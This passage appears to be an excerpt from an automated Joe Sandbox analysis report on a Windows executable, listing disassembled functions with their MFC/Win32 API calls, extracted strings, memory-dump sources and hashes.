                                                                • Part of subcall function 004E06C9: SelectObject.GDI32(?,?), ref: 004E0705
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Move$ObjectSelect$H_prolog3Line
                                                              • String ID: iii$iii
                                                              • API String ID: 3726201289-3499908146
                                                              • Opcode ID: 3cc78c8949d5b0a745599dca76a06de8be45f999bd33b896ba07f999f102eb96
                                                              • Instruction ID: beaf22f1e0a21ef03200a3d95d0eef95d0118a065e43927da9582931d764a9de
                                                              • Opcode Fuzzy Hash: 3cc78c8949d5b0a745599dca76a06de8be45f999bd33b896ba07f999f102eb96
                                                              • Instruction Fuzzy Hash: E231A175A0014AEFCF01EFA5C852EEE3B76BF08704F00401AF911A7291CB749E25CB69
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ParentRectWindow
                                                              • String ID: To`
                                                              • API String ID: 2562589006-992168270
                                                              • Opcode ID: 4e2c0c6b1f811aa5128a5e6842c79076485718d65b8fb03078d23b48064e68c9
                                                              • Instruction ID: 313c82b72907c9aff2682393ec38112059b2bf311e3b0196a560e4d2b3b441ca
                                                              • Opcode Fuzzy Hash: 4e2c0c6b1f811aa5128a5e6842c79076485718d65b8fb03078d23b48064e68c9
                                                              • Instruction Fuzzy Hash: EF216D71A01209AFCB14DFA5C889DBFBBB9FF88304F10406EE51AA7240CB346D01CBA5
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: 4yZ$4yZ
                                                              • API String ID: 176396367-3871332908
                                                              • Opcode ID: 8d9d0585275515b6b8752dac7c594bb602b68465ebc120bb42d6c3bc9616b8f2
                                                              • Instruction ID: b722c6a9f291d89ded7bf3a2b3fef12f06f317471036e99529087a2fd848615c
                                                              • Opcode Fuzzy Hash: 8d9d0585275515b6b8752dac7c594bb602b68465ebc120bb42d6c3bc9616b8f2
                                                              • Instruction Fuzzy Hash: 4E210732900216DBCB349F68C8426FA7BB5FF517A0F198469E8469B190E3B4FE85D360
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: EmptyH_prolog3_Rect
                                                              • String ID: Afx:ToolBar
                                                              • API String ID: 2941628838-177727192
                                                              • Opcode ID: 18bb6c6e35354f220ec4a30ca436d98b35f2adaff36e31e97cfab298748cfc48
                                                              • Instruction ID: b5a5bc9d0c5e5e706e3b9959d4c8ddfd6974994a7376df4f35f9705b886ef4e3
                                                              • Opcode Fuzzy Hash: 18bb6c6e35354f220ec4a30ca436d98b35f2adaff36e31e97cfab298748cfc48
                                                              • Instruction Fuzzy Hash: FE218B71A5021E9FCF04DFB4C996AEE7AA5FF48354F04052AF515E7281DB3899048BA4
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0050B0E3
                                                              • SetRect.USER32(?,?,?,?,?), ref: 0050B127
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Window
                                                              • String ID: c
                                                              • API String ID: 924285169-2927717585
                                                              • Opcode ID: 6cdd1cfdc628a1f4622d98c8e798da3652668935587eb1f0f4ad251938285a7a
                                                              • Instruction ID: 1b569142811442854ce0ed02441218f67371166d744372e4f1b9c959e20afd43
                                                              • Opcode Fuzzy Hash: 6cdd1cfdc628a1f4622d98c8e798da3652668935587eb1f0f4ad251938285a7a
                                                              • Instruction Fuzzy Hash: A931ECB0E002089FDB10CFA9C984AAEFBF9FF98304B10855EE556E3255D774A904CFA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3Window
                                                              • String ID: 83`
                                                              • API String ID: 616115145-1826646354
                                                              • Opcode ID: cd53cd9544a14d90c28a9336ed077c8a5b93aaebb934624b3001ec7b0501b341
                                                              • Instruction ID: 127da561b8b8bf950a244246d728d8af4e77c314372a0a89a30383e2b7debfd9
                                                              • Opcode Fuzzy Hash: cd53cd9544a14d90c28a9336ed077c8a5b93aaebb934624b3001ec7b0501b341
                                                              • Instruction Fuzzy Hash: BD21D830600612DFCF04BB658819ABDBFA5BF88700F00005EE901AB2A1DF345B018BD5
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0050CB5A
                                                                • Part of subcall function 004ECC18: GetWindowLongW.USER32(?,000000EC), ref: 004ECC23
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3LongWindow
                                                              • String ID: Afx:MiniFrame$c
                                                              • API String ID: 92005281-2406227893
                                                              • Opcode ID: d7db4713114ff2425c7a464fab694859c4c4201077deba36701b5fd8d14183da
                                                              • Instruction ID: a8502f6697c48d9478eb25861b5713c18c5bfe1cb49c5f2f060c54f5073f2761
                                                              • Opcode Fuzzy Hash: d7db4713114ff2425c7a464fab694859c4c4201077deba36701b5fd8d14183da
                                                              • Instruction Fuzzy Hash: 6C21B0312006059BDB149F72C856BAE3EA5FF86310F14062DB917C72D1EB34D911C794
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 005BA121
                                                                • Part of subcall function 005A7DE9: __EH_prolog3.LIBCMT ref: 005A7DF0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: X*b$dF`
                                                              • API String ID: 431132790-1133291677
                                                              • Opcode ID: 4340fbfc967da84c816dc3f2ac8328eb33438b4e74315e58675ae93a3e96ea0f
                                                              • Instruction ID: 1b214e1eb6136fb6a15ecd5d03eb7c97690bca78141f3e5ca9e643a7da5e5404
                                                              • Opcode Fuzzy Hash: 4340fbfc967da84c816dc3f2ac8328eb33438b4e74315e58675ae93a3e96ea0f
                                                              • Instruction Fuzzy Hash: 5E3170B4405B85DED725EB75C5157EABBE0AF61319F10484EE19B132C2CF782708CB6A
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 004FE426
                                                                • Part of subcall function 0055EBDB: __EH_prolog3.LIBCMT ref: 0055EBE2
                                                                • Part of subcall function 0055E8FE: __EH_prolog3.LIBCMT ref: 0055E905
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: %sMFCToolBarParameters$LargeIcons
                                                              • API String ID: 431132790-2076908790
                                                              • Opcode ID: 68490d7cbc9dd1f2f150532108f872d88fba8ca6af78e42a89ee67cf296913aa
                                                              • Instruction ID: ff9f37094b264e897a575e55abadb0805004a9c6074f50ef2d3973a5c9e74e89
                                                              • Opcode Fuzzy Hash: 68490d7cbc9dd1f2f150532108f872d88fba8ca6af78e42a89ee67cf296913aa
                                                              • Instruction Fuzzy Hash: 0921C570A00209DFCB15DFA5C856EBEBFB1BF84318F14005EF5069B392DA759A44C795
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 005B6476
                                                                • Part of subcall function 005A4024: __EH_prolog3.LIBCMT ref: 005A402B
                                                                • Part of subcall function 005B4C7F: __EH_prolog3.LIBCMT ref: 005B4C86
                                                                • Part of subcall function 005B4C7F: SetRectEmpty.USER32(?), ref: 005B4D3B
                                                                • Part of subcall function 005B4C7F: CreateCompatibleDC.GDI32(00000000), ref: 005B4D3E
                                                                • Part of subcall function 005B4C7F: SetRectEmpty.USER32(?), ref: 005B4D5D
                                                                • Part of subcall function 005B4C7F: CreatePen.GDI32(00000000,00000001,?), ref: 005B4D68
                                                                • Part of subcall function 004FE54D: __EH_prolog3.LIBCMT ref: 004FE554
                                                                • Part of subcall function 004FE54D: SetRectEmpty.USER32(?), ref: 004FE70B
                                                              • GetObjectW.GDI32(00000005,00000018,?), ref: 005B6564
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$EmptyRect$Create$CompatibleObject
                                                              • String ID: |ra
                                                              • API String ID: 1351999187-2232812188
                                                              • Opcode ID: 568d248b67333ed3354ec387a10529ecfef7e150119a221e57643f07d3851e74
                                                              • Instruction ID: 2ab9c7b17014627e94b7db9a9acfb53e66f61983d33ff101fb7fbce6072e1b98
                                                              • Opcode Fuzzy Hash: 568d248b67333ed3354ec387a10529ecfef7e150119a221e57643f07d3851e74
                                                              • Instruction Fuzzy Hash: 3F31F5B4901B44CFC726DFA9C5946DABBE8BF18300F40491EE5AE87282CB706604CB11
                                                              APIs
                                                              • _memset.LIBCMT ref: 0055CD2E
                                                              • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 0055CD5B
                                                                • Part of subcall function 004E8214: SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004E8239
                                                                • Part of subcall function 004E8214: GetKeyState.USER32(00000001), ref: 004E824E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$State_memset
                                                              • String ID: ,
                                                              • API String ID: 930327405-3772416878
                                                              • Opcode ID: 9c11d92fb4b0271babefe6bc8c7b67620d9b6d528328fce20c730d333dc253f5
                                                              • Instruction ID: 513a30851eaf24885cb3067d2270493cbb4a71b02159e96b849b1c0f7aace243
                                                              • Opcode Fuzzy Hash: 9c11d92fb4b0271babefe6bc8c7b67620d9b6d528328fce20c730d333dc253f5
                                                              • Instruction Fuzzy Hash: 5111AF71900388AFDB20EFA2C895B9ABFF4FF40715F20002FE945AA551D7B4E948CB54
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0050C8FC
                                                              • SendMessageW.USER32(00000000,00000085,00000000,00000000), ref: 0050C934
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageRectSendWindow
                                                              • String ID: c
                                                              • API String ID: 2814762282-2927717585
                                                              • Opcode ID: b82c324761dc9a0b13d2b79d1de25a09e26900ba7718e0ed2754290b6c411c72
                                                              • Instruction ID: 46fcf42110295dbeb84d23a4262c4c2c08d7452ed1f2d3ae911a282fd4dfe27c
                                                              • Opcode Fuzzy Hash: b82c324761dc9a0b13d2b79d1de25a09e26900ba7718e0ed2754290b6c411c72
                                                              • Instruction Fuzzy Hash: 1511A071A00209AFCF14ABA69C49DAFFFBAFFC9700B10011EF006A2291DE755A01DB65
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Show
                                                              • String ID: `c
                                                              • API String ID: 990937876-2598275076
                                                              • Opcode ID: d35196e6da63d5d001301ca7e32b28bb0b0d8c2544993eb3e9ddbfaad98f39bc
                                                              • Instruction ID: f53adfd035a02aec97fadf252ccff0afc0bc95f262de6ef775a49a59a0354021
                                                              • Opcode Fuzzy Hash: d35196e6da63d5d001301ca7e32b28bb0b0d8c2544993eb3e9ddbfaad98f39bc
                                                              • Instruction Fuzzy Hash: DD01D8332412115BFB105A298845FA67B9AFF90724F1A002AED09DB281DF7CECC1CEA4
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CopyInfoMonitorRect
                                                              • String ID: (
                                                              • API String ID: 2119610155-3887548279
                                                              • Opcode ID: 8cca6aaf32baaca1b00555617f94b8cc8000aa45a1f0223dc5c80a1c70c313ff
                                                              • Instruction ID: a48b696ce7ba1548370883f756bd2a4b6eab2fbb596eea231987b7beaad41bdf
                                                              • Opcode Fuzzy Hash: 8cca6aaf32baaca1b00555617f94b8cc8000aa45a1f0223dc5c80a1c70c313ff
                                                              • Instruction Fuzzy Hash: A911D371A0060AAFCB50CFA9C985D9EBBF5FB08300B50886AE45AE7710DB34F945CF64
                                                              APIs
                                                                • Part of subcall function 004E8C1E: GetModuleHandleW.KERNEL32(?,?,004EE796), ref: 004E8C2C
                                                                • Part of subcall function 004E8C1E: LoadLibraryW.KERNEL32(?,?,004EE796), ref: 004E8C3C
                                                              • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 004EE79C
                                                              • _memset.LIBCMT ref: 004EE7B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleLibraryLoadModuleProc_memset
                                                              • String ID: DllGetVersion
                                                              • API String ID: 3385804498-2861820592
                                                              • Opcode ID: 2997cd22b235b1b5fabaa6fd8a6db35c40a131bc21494b8c3446a52d4adfa601
                                                              • Instruction ID: d6e5bb7c7ac375cd545c17a012632a8248cbfbb93c0073f9585a1fe6940874ea
                                                              • Opcode Fuzzy Hash: 2997cd22b235b1b5fabaa6fd8a6db35c40a131bc21494b8c3446a52d4adfa601
                                                              • Instruction Fuzzy Hash: E5019E71A0021DABD700EBAAD885BAE7BF8AB04754F50012AFA05E7291EB74DC44C7A4
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 004D9761
                                                              • PathFindExtensionW.SHLWAPI(?), ref: 004D9777
                                                                • Part of subcall function 004D9583: GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 004D95C8
                                                                • Part of subcall function 004D9583: _memset.LIBCMT ref: 004D95F4
                                                                • Part of subcall function 004D9583: _wcstoul.LIBCMT ref: 004D963C
                                                                • Part of subcall function 004D9583: _wcslen.LIBCMT ref: 004D965D
                                                                • Part of subcall function 004D9583: GetUserDefaultUILanguage.KERNEL32 ref: 004D966D
                                                                • Part of subcall function 004D9583: ConvertDefaultLocale.KERNEL32(?), ref: 004D9694
                                                                • Part of subcall function 004D9583: ConvertDefaultLocale.KERNEL32(?), ref: 004D96A3
                                                                • Part of subcall function 004D9583: GetSystemDefaultUILanguage.KERNEL32 ref: 004D96AC
                                                                • Part of subcall function 004D9583: ConvertDefaultLocale.KERNEL32(?), ref: 004D96C8
                                                                • Part of subcall function 004D9583: ConvertDefaultLocale.KERNEL32(?), ref: 004D96D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
